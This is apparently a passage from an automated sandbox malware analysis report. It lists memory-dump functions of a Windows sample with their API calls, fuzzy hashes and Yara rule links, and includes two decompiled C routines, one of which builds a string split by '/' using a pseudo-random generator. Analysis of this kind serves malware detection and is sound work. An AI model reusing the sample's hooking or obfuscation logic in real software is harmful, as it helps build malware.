                              • API ID: memset$_allmul_aulldiv
                              • String ID:
                              • API String ID: 3041852380-0
                              • Opcode ID: e40b76843f74921440fe126e5a6c4c56754040b1fb0379038aaf4928c9d623c4
                              • Instruction ID: 05dd4b9ae7dcee21a5d62863d0bf08548410d64feffd304cc5c07d829c041a91
                              • Opcode Fuzzy Hash: e40b76843f74921440fe126e5a6c4c56754040b1fb0379038aaf4928c9d623c4
                              • Instruction Fuzzy Hash: CC419171A0032AAFDB109F6CCC48BEF77A9EF55318F004569E919A72C1DB70AE548B91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01025853, Relevance: 6.1, APIs: 4, Instructions: 120synchronizationCOMMON
                              Download Yara Rule
                              APIs
                              • WaitForSingleObject.KERNEL32(00000000,?,?,?,?,?,?,?,?,0103F2F3,?,?,?,?,?,00000001), ref: 0103C7CD
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,0103F2F3,?,?,?,?,?,00000001), ref: 0103C7ED
                                • Part of subcall function 01024AFE: wcstombs.NTDLL ref: 01024BBC
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: ErrorLastObjectSingleWaitwcstombs
                              • String ID:
                              • API String ID: 2344289193-0
                              • Opcode ID: b240ef31dc1f06a6cca48700f1bc9153d1f6105837448aef1da4fb222d54e68c
                              • Instruction ID: 8f78a5968c12acde92106397c2569be3b9eea5a588562511e4e7af1521f1d6ce
                              • Opcode Fuzzy Hash: b240ef31dc1f06a6cca48700f1bc9153d1f6105837448aef1da4fb222d54e68c
                              • Instruction Fuzzy Hash: 44414CB4D00209EFEF219FA9CA885AEBBFDFB44355F1044AAE582F3141D7759A40DB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102C873, Relevance: 6.1, APIs: 4, Instructions: 119stringCOMMON
                              Download Yara Rule
                              APIs
                              • StrRChrA.SHLWAPI(?,00000000,00000023), ref: 0102C88D
                              • StrChrA.SHLWAPI(?,0000005C), ref: 0102C8B4
                              • lstrcpyn.KERNEL32(?,?,00000001,00000001), ref: 0102C8DA
                              • lstrcpy.KERNEL32(?,?), ref: 0102C97E
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: lstrcpylstrcpyn
                              • String ID:
                              • API String ID: 4154805583-0
                              • Opcode ID: 4037df7399236e32e96da7eba1ef69c531e40b649f6b3bc5909905f69a3f0c31
                              • Instruction ID: bfb2c9c5f77665690925173b290d9e05c6e6653570710841dcebbc1018d3809b
                              • Opcode Fuzzy Hash: 4037df7399236e32e96da7eba1ef69c531e40b649f6b3bc5909905f69a3f0c31
                              • Instruction Fuzzy Hash: BE415DB6900119BFEB11DFA8DE84DEEBBFCAB09350F0481A6F981E3145D6349A44CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0103E3CD, Relevance: 6.1, APIs: 4, Instructions: 113COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: _strupr
                              • String ID:
                              • API String ID: 3408778250-0
                              • Opcode ID: 25b787c4ed6483c25c09c79529d94e131e6b19b6241aea9c9f1a4b45430ee269
                              • Instruction ID: 1a2aaeea7fa5a05d2a6b65632f19847f0285494901736aae2c073575828eac87
                              • Opcode Fuzzy Hash: 25b787c4ed6483c25c09c79529d94e131e6b19b6241aea9c9f1a4b45430ee269
                              • Instruction Fuzzy Hash: D141527180020AAFDF20DF68D888AEEB7F9EF58340F104566E9A5D7154EB38E945CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01026C90, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 01036A98: GetSystemTimeAsFileTime.KERNEL32(?,?,00000000), ref: 01036AA6
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 01026CF8
                              • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 01026D47
                                • Part of subcall function 01026D99: CreateFileW.KERNEL32(00000000,C0000000,010223FB,00000000,010223FC,00000080,00000000,00000000,01048BAA,747869A0,010223FB,?), ref: 01026DDA
                                • Part of subcall function 01026D99: GetLastError.KERNEL32 ref: 01026DE4
                                • Part of subcall function 01026D99: WaitForSingleObject.KERNEL32(000000C8), ref: 01026E09
                                • Part of subcall function 01026D99: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 01026E2A
                                • Part of subcall function 01026D99: SetFilePointer.KERNEL32(00000001,00000000,00000000,00000002), ref: 01026E52
                                • Part of subcall function 01026D99: WriteFile.KERNEL32(00000001,00001388,?,00000002,00000000), ref: 01026E67
                                • Part of subcall function 01026D99: SetEndOfFile.KERNEL32(00000001), ref: 01026E74
                                • Part of subcall function 01026D99: CloseHandle.KERNEL32(00000001), ref: 01026E8C
                              • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000101,?,00000000,?,?,?,00000000,?,00000001), ref: 01026D7C
                              • HeapFree.KERNEL32(00000000,?,?,00000000,?,00000001), ref: 01026D8C
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: File$Heap$AllocateCreateFreeTime$CloseErrorHandleLastObjectPointerSingleSystemWaitWrite
                              • String ID:
                              • API String ID: 4200334623-0
                              • Opcode ID: 8939dc51b7285ab628b3ea314bb4f33cfb991cccfaef11dfb366a8a56489a11e
                              • Instruction ID: 2563e5f3dfbf53288f2227734598ef6f2ffde30ca1747e747a1090b9e5bf8178
                              • Opcode Fuzzy Hash: 8939dc51b7285ab628b3ea314bb4f33cfb991cccfaef11dfb366a8a56489a11e
                              • Instruction Fuzzy Hash: 4A311AB9900119FFEB109FA8CD88DAEBBBDFB08344B104065F641D3124D776AE51DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01021C03, Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                              Download Yara Rule
                              APIs
                              • TlsGetValue.KERNEL32(?), ref: 01021C32
                              • SetEvent.KERNEL32(?), ref: 01021C7C
                              • TlsSetValue.KERNEL32(00000001), ref: 01021CB6
                              • TlsSetValue.KERNEL32(00000000), ref: 01021CD2
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Value$Event
                              • String ID:
                              • API String ID: 3803239005-0
                              • Opcode ID: 10c2979063b4bfd169fa546f3aba328045e3bbfade38b39ba32db0b2bd97d307
                              • Instruction ID: ed76903785a165f90922e4a0e225fb7f51a06f38cf69ac6e21766ac3cf816b96
                              • Opcode Fuzzy Hash: 10c2979063b4bfd169fa546f3aba328045e3bbfade38b39ba32db0b2bd97d307
                              • Instruction Fuzzy Hash: 8621DE75200228EFEB729F29DD809AE7BE6FF51350B244429F582CB1A4D372EC51CB40
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0103BC12, Relevance: 6.1, APIs: 4, Instructions: 83memoryregistryCOMMON
                              Download Yara Rule
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0103BC6B
                              • memcpy.NTDLL(00000018,?,?), ref: 0103BC94
                              • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_0000A97F,00000000,000000FF,00000008), ref: 0103BCD3
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0103BCE6
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$AllocateFreeObjectRegisterSingleWaitmemcpy
                              • String ID:
                              • API String ID: 2780211928-0
                              • Opcode ID: 68e786898ac14eabf55dad9d78433a4c39152f2c004ac8515b6c38227eb92926
                              • Instruction ID: f4ae208b2bbc996cab3cac13fdb39de959c8c698a8b92e325869a9e37a8c88fe
                              • Opcode Fuzzy Hash: 68e786898ac14eabf55dad9d78433a4c39152f2c004ac8515b6c38227eb92926
                              • Instruction Fuzzy Hash: 31318C7420020AEFDB718F19DD84E9A7BADFF44725F004129F9A6D62A4DB75D811CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0104294F, Relevance: 6.1, APIs: 4, Instructions: 82memorystringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 01045371: memcpy.NTDLL(00000000,00000110,04B38560,04B38560,00000001,00000000), ref: 010453AD
                                • Part of subcall function 01045371: memset.NTDLL ref: 0104542E
                                • Part of subcall function 01045371: memset.NTDLL ref: 01045443
                              • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 010429A7
                              • lstrcmpi.KERNEL32(00000000,?), ref: 010429CE
                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01042A13
                              • HeapFree.KERNEL32(00000000,?,?,?,?,04B38560,00000001,00000000), ref: 01042A24
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$Freememset$Allocatelstrcmpimemcpy
                              • String ID:
                              • API String ID: 1065503980-0
                              • Opcode ID: c093036f97edf2b447a50d71eb96a5103d47500acd8b3349b641a0c82ddaf074
                              • Instruction ID: 752bee96242414b1b1506bdfee5aed1fe45f7b5bc8771ad25d29bd6f4747c2a2
                              • Opcode Fuzzy Hash: c093036f97edf2b447a50d71eb96a5103d47500acd8b3349b641a0c82ddaf074
                              • Instruction Fuzzy Hash: 7D217EB5A0020AFFDF219FA5ED84AAE7BB9EF44354F004065F985E7128D7359D24CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E7796, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                              Download Yara Rule
                              C-Code - Quality: 78%
                              			E013E7796(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E013E55DC(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                              0x013e77a2
                              0x013e77a6
                              0x013e77a7
                              0x013e77a8
                              0x013e77aa
                              0x013e77ac
                              0x013e77b1
                              0x013e77b4
                              0x013e784b
                              0x013e7852
                              0x013e7852
                              0x013e77bd
                              0x013e77c4
                              0x013e77d4
                              0x013e77d4
                              0x013e77da
                              0x013e77dc
                              0x013e77e1
                              0x013e77ea
                              0x013e77f2
                              0x013e77f5
                              0x013e7800
                              0x013e7804
                              0x013e7806
                              0x013e7807
                              0x013e7810
                              0x013e7814
                              0x013e7825
                              0x013e7816
                              0x013e781b
                              0x013e7820
                              0x013e782f
                              0x013e782f
                              0x013e7804
                              0x013e7835
                              0x013e783b
                              0x013e783b
                              0x013e7844
                              0x013e7849
                              0x013e7849
                              0x00000000

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: FreeSleepStringlstrlenmemcpy
                              • String ID:
                              • API String ID: 1198164300-0
                              • Opcode ID: 57e04c2c98435b01b4eabae0a012a88a6594e35dbd480b29ec65cba0609ca560
                              • Instruction ID: 12b8ef4a4e3d39f55735cba47519f3c04f2b90f90234273e4e477a14a399c618
                              • Opcode Fuzzy Hash: 57e04c2c98435b01b4eabae0a012a88a6594e35dbd480b29ec65cba0609ca560
                              • Instruction Fuzzy Hash: 0C213E75900319EFDB11DFA8D88899EBFF8EF59315B104169E905E7240E770DA01CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102EEDE, Relevance: 6.1, APIs: 4, Instructions: 75stringCOMMON
                              Download Yara Rule
                              APIs
                              • memset.NTDLL ref: 0102EF00
                              • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 0102EF44
                              • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 0102EF87
                              • CloseHandle.KERNEL32(?,?,?,?,?), ref: 0102EFAA
                                • Part of subcall function 0103D6A6: GetTickCount.KERNEL32 ref: 0103D6B6
                                • Part of subcall function 0103D6A6: CreateFileW.KERNEL32(01024252,80000000,00000003,01050244,00000003,00000000,00000000,?,00000000,?,01024252), ref: 0103D6D3
                                • Part of subcall function 0103D6A6: GetFileSize.KERNEL32(01024252,00000000,?,00000001,?,00000000,?,01024252), ref: 0103D706
                                • Part of subcall function 0103D6A6: CreateFileMappingA.KERNEL32(01024252,01050244,00000002,00000000,00000000,01024252), ref: 0103D71A
                                • Part of subcall function 0103D6A6: lstrlen.KERNEL32(01024252,?,00000000,?,01024252), ref: 0103D736
                                • Part of subcall function 0103D6A6: lstrcpy.KERNEL32(?,01024252), ref: 0103D746
                                • Part of subcall function 0103D6A6: HeapFree.KERNEL32(00000000,01024252,?,00000000,?,01024252), ref: 0103D761
                                • Part of subcall function 0103D6A6: CloseHandle.KERNEL32(01024252,?,00000001,?,00000000,?,01024252), ref: 0103D773
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: File$CloseCreateHandleMappinglstrlen$CountFreeHeapOpenSizeTicklstrcpymemset
                              • String ID:
                              • API String ID: 3239194699-0
                              • Opcode ID: bb66d8d38db86f034d59bd4223499208778cd7fa4db2da5e8590ef2c194665ab
                              • Instruction ID: 6eb9a953c9428e4dbebb1c2f6f9b94c726d0835657622ee770b9213b79cc5ccc
                              • Opcode Fuzzy Hash: bb66d8d38db86f034d59bd4223499208778cd7fa4db2da5e8590ef2c194665ab
                              • Instruction Fuzzy Hash: A6218BB1540218EFEB61DFA9DD44EDEBBF8FF48354F100125F9A992260E7318405CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01024CC5, Relevance: 6.1, APIs: 4, Instructions: 73stringCOMMON
                              Download Yara Rule
                              APIs
                              • memset.NTDLL ref: 01024CF4
                              • lstrlen.KERNEL32(01022C01), ref: 01024D04
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • strcpy.NTDLL ref: 01024D1B
                              • StrChrA.SHLWAPI(00000000,0000003A,00000001), ref: 01024D25
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: AllocateHeaplstrlenmemsetstrcpy
                              • String ID:
                              • API String ID: 528014985-0
                              • Opcode ID: 8869d94d038ece2bed0896e1b0627634517b77ec61d2c669bd076ab138e660a8
                              • Instruction ID: 8ba74b14090bf1d975d42734c3a787b670e6d819df1ccef4f586bc7581efeddb
                              • Opcode Fuzzy Hash: 8869d94d038ece2bed0896e1b0627634517b77ec61d2c669bd076ab138e660a8
                              • Instruction Fuzzy Hash: 1A21D5B9100702AFE3316F68D888B6A7BFCEF44711F108459FAD6C7285EB76D4408721
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01023E09, Relevance: 6.1, APIs: 4, Instructions: 70fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 01044BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,01023E20), ref: 01044BF0
                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 01023E5B
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,010268F0,?), ref: 01023E6D
                              • ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,010268F0,?), ref: 01023E85
                              • CloseHandle.KERNEL32(?,?,?,?,?,?,010268F0,?), ref: 01023EA0
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: File$CloseCreateHandleModuleNamePointerRead
                              • String ID:
                              • API String ID: 1352878660-0
                              • Opcode ID: 22e5aaa6eac8ebedf444746a76c4701721d79ad90ac46cbcba739af154da6e8e
                              • Instruction ID: 89f84aca9c7da7a3399398f343daa7e120d340813d086dbaec888d6603872de5
                              • Opcode Fuzzy Hash: 22e5aaa6eac8ebedf444746a76c4701721d79ad90ac46cbcba739af154da6e8e
                              • Instruction Fuzzy Hash: 001151B1A00128BBDF21AEA9CD88FEF7EADEF45790F104465F655E6090D3359A44CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01034B11, Relevance: 6.1, APIs: 4, Instructions: 68stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?,00000004,0102B24B,00000004,00000000), ref: 01034B49
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • lstrcpy.KERNEL32(00000000,?), ref: 01034B60
                              • StrChrA.SHLWAPI(00000000,0000002E), ref: 01034B69
                              • GetModuleHandleA.KERNEL32(00000000), ref: 01034B87
                                • Part of subcall function 0102ADDF: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,00000000,00000005,00000400,?,?,?,00000000,00000000,00000004,0104F518,?,0104F4B4), ref: 0102AEB6
                                • Part of subcall function 0102ADDF: VirtualProtect.KERNELBASE(00000000,00000004,0104F518,0104F518,?,00000000,00000000,00000004,0104F518,?,0104F4B4,00000000,00000002,0104C578,0000001C,0103496D), ref: 0102AED1
                                • Part of subcall function 0102ADDF: RtlEnterCriticalSection.NTDLL(01050460), ref: 0102AEF5
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: ProtectVirtual$AllocateCriticalEnterHandleHeapModuleSectionlstrcpylstrlen
                              • String ID:
                              • API String ID: 105881616-0
                              • Opcode ID: 49296cd1a7e5f5c392fcef30ee8fe698f71bc22c7155386231a421c970dbbc0d
                              • Instruction ID: 8eba195ad1ba8197b7cb8da06080fb3773f48bde024b825ad972aa84f59dd88c
                              • Opcode Fuzzy Hash: 49296cd1a7e5f5c392fcef30ee8fe698f71bc22c7155386231a421c970dbbc0d
                              • Instruction Fuzzy Hash: 10214874A00205EFDB54DFA8C988BAEBBFCBF84300F148199E986DB250D774D940CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01032DDE, Relevance: 6.1, APIs: 4, Instructions: 68stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlenW.KERNEL32(?,00000000,747C8250,747869A0,?,?,?,01025AE4,?,00000000,?), ref: 01032DEE
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,01025AE4,?,00000000,?), ref: 01032E10
                              • lstrcpyW.KERNEL32(00000000,?), ref: 01032E3C
                              • lstrcatW.KERNEL32(00000000,?), ref: 01032E4F
                                • Part of subcall function 010441EE: strstr.NTDLL ref: 010442C6
                                • Part of subcall function 010441EE: strstr.NTDLL ref: 01044319
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: strstr$AllocateByteCharHeapMultiWidelstrcatlstrcpylstrlen
                              • String ID:
                              • API String ID: 3712611166-0
                              • Opcode ID: b68f14b635b33a4f343d8f22f565c840bc531f93dbf1a30cb83c6e61716be718
                              • Instruction ID: c1f41e8788196e1215988e8cb35e759eb8d2aa5a690e1c2d91014962b093c9ff
                              • Opcode Fuzzy Hash: b68f14b635b33a4f343d8f22f565c840bc531f93dbf1a30cb83c6e61716be718
                              • Instruction Fuzzy Hash: 541147B6600119BFDB219FA9DC88DEF7BACEF55390B004164FA85D6110D735DA408BA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0103D39E, Relevance: 6.1, APIs: 4, Instructions: 67registryCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyA.ADVAPI32(80000001,00000008,00000008), ref: 0103D3B9
                              • RegQueryValueExA.ADVAPI32(00000008,?,00000000,?,00000000,?,00000008,?,00000008), ref: 0103D3DD
                              • RegCloseKey.ADVAPI32(00000008,?,00000008), ref: 0103D435
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • RegQueryValueExA.ADVAPI32(00000008,?,00000000,?,00000000,?,?,00000000,?,00000008), ref: 0103D406
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: QueryValue$AllocateCloseHeapOpen
                              • String ID:
                              • API String ID: 453107315-0
                              • Opcode ID: 7df0511cf3ad7b4e70e72f15366ff8cdaf61738369a9d4f6dccaaa3bfffb13ce
                              • Instruction ID: caf9b5baaf56539a0b3d6b6fb4778402194b92fdc9a957d8a71615bf45b14207
                              • Opcode Fuzzy Hash: 7df0511cf3ad7b4e70e72f15366ff8cdaf61738369a9d4f6dccaaa3bfffb13ce
                              • Instruction Fuzzy Hash: BB21D6B990010DFFDB119F98D9808EEBFBDEF84340F9080A6F941A6114D771AA55DB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0104026E, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,01030BA2,00000000,?,?,0103F27A,?,04B3C0E0), ref: 01040279
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 01040291
                              • memcpy.NTDLL(00000000,04B3C0E0,-00000008,?,?,?,01030BA2,00000000,?,?,0103F27A,?,04B3C0E0), ref: 010402D5
                              • memcpy.NTDLL(00000001,04B3C0E0,00000001,0103F27A,?,04B3C0E0), ref: 010402F6
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: memcpy$AllocateHeaplstrlen
                              • String ID:
                              • API String ID: 1819133394-0
                              • Opcode ID: 1ed4b7575e186487246b543a053c629ec16e296b59f1246c1ebea118186ebf6e
                              • Instruction ID: ae1987a153dbe295089fa3f9c81506af7699f2358d4e027c27b289a88c12a7a5
                              • Opcode Fuzzy Hash: 1ed4b7575e186487246b543a053c629ec16e296b59f1246c1ebea118186ebf6e
                              • Instruction Fuzzy Hash: B41159B6A00205AFD7208FA9DCC4D9EBFEEEBC0350B050176F584D7144EA759E008760
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E484D, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                              Download Yara Rule
                              C-Code - Quality: 68%
                              			E013E484D(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x13ed270, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x13ed288; // 0x2a674dbc
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x13ed288 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                              0x013e4855
                              0x013e4858
                              0x013e485e
                              0x013e4876
                              0x013e487a
                              0x013e487d
                              0x013e487f
                              0x013e4882
                              0x013e4884
                              0x013e4887
                              0x013e4889
                              0x013e4889
                              0x013e488b
                              0x013e4896
                              0x013e489b
                              0x013e48ac
                              0x013e48b4
                              0x013e48b9
                              0x013e48bc
                              0x013e48bf
                              0x013e48c1
                              0x013e48c7
                              0x013e48ca
                              0x013e48ca
                              0x013e48ca
                              0x013e48d5
                              0x013e48da
                              0x013e48e4

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,013EA88E,00000000,?,74785520,013E64DC,?,03AD95B0), ref: 013E4858
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 013E4870
                              • memcpy.NTDLL(00000000,03AD95B0,-00000008,?,?,?,013EA88E,00000000,?,74785520,013E64DC,?,03AD95B0), ref: 013E48B4
                              • memcpy.NTDLL(00000001,03AD95B0,00000001,013E64DC,?,03AD95B0), ref: 013E48D5
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: memcpy$AllocateHeaplstrlen
                              • String ID:
                              • API String ID: 1819133394-0
                              • Opcode ID: 5a20cc6cecde4ee2af4e9896fca59302f44aa5e5ed069bc8986e009b6263382e
                              • Instruction ID: effc7c1cfd529c2e38e56cd1c6153ad997818bd271115d5504fb5eaa7fa9b06e
                              • Opcode Fuzzy Hash: 5a20cc6cecde4ee2af4e9896fca59302f44aa5e5ed069bc8986e009b6263382e
                              • Instruction Fuzzy Hash: FD11E372A00324ABC7208AA9EC8899EBFEDDB85360F150166E505DB180E6709E04C7A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0103E330, Relevance: 6.1, APIs: 4, Instructions: 58threadCOMMON
                              Download Yara Rule
                              APIs
                              • GlobalFix.KERNEL32(00000000), ref: 0103E370
                              • memset.NTDLL ref: 0103E384
                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 0103E391
                                • Part of subcall function 01038B6D: OpenProcess.KERNEL32(00000410,0A74F33B,010322DF,00000000,00000000,010322DF,0000001C,00000000,00000000,?,?,?,010322DF), ref: 01038BC7
                                • Part of subcall function 01038B6D: CloseHandle.KERNEL32(00000000,00000000,00000000,010322EF,00000104,?,?,?,010322DF), ref: 01038BE5
                                • Part of subcall function 01038B6D: GetSystemTimeAsFileTime.KERNEL32(010322DF), ref: 01038C4B
                              • GlobalUnWire.KERNEL32(00000000), ref: 0103E3BC
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: GlobalProcessTime$CloseFileHandleOpenSystemThreadWindowWirememset
                              • String ID:
                              • API String ID: 3286078456-0
                              • Opcode ID: c1a16061119bb89fecbdc811a6928582acc37ebdebbd517395015657dcfd9647
                              • Instruction ID: 081e139bf60710d7f3699cb6368beacda45f4c3b9d8d56d54c991105abf10050
                              • Opcode Fuzzy Hash: c1a16061119bb89fecbdc811a6928582acc37ebdebbd517395015657dcfd9647
                              • Instruction Fuzzy Hash: 471173F5A00206AFE721ABA8E98CF9E7ABCAF48701F144155E986F2144DB75C5008B65
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0103154C, Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                              Download Yara Rule
                              APIs
                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000001,?,?,?,0102C682,00000000,00000000), ref: 0103156A
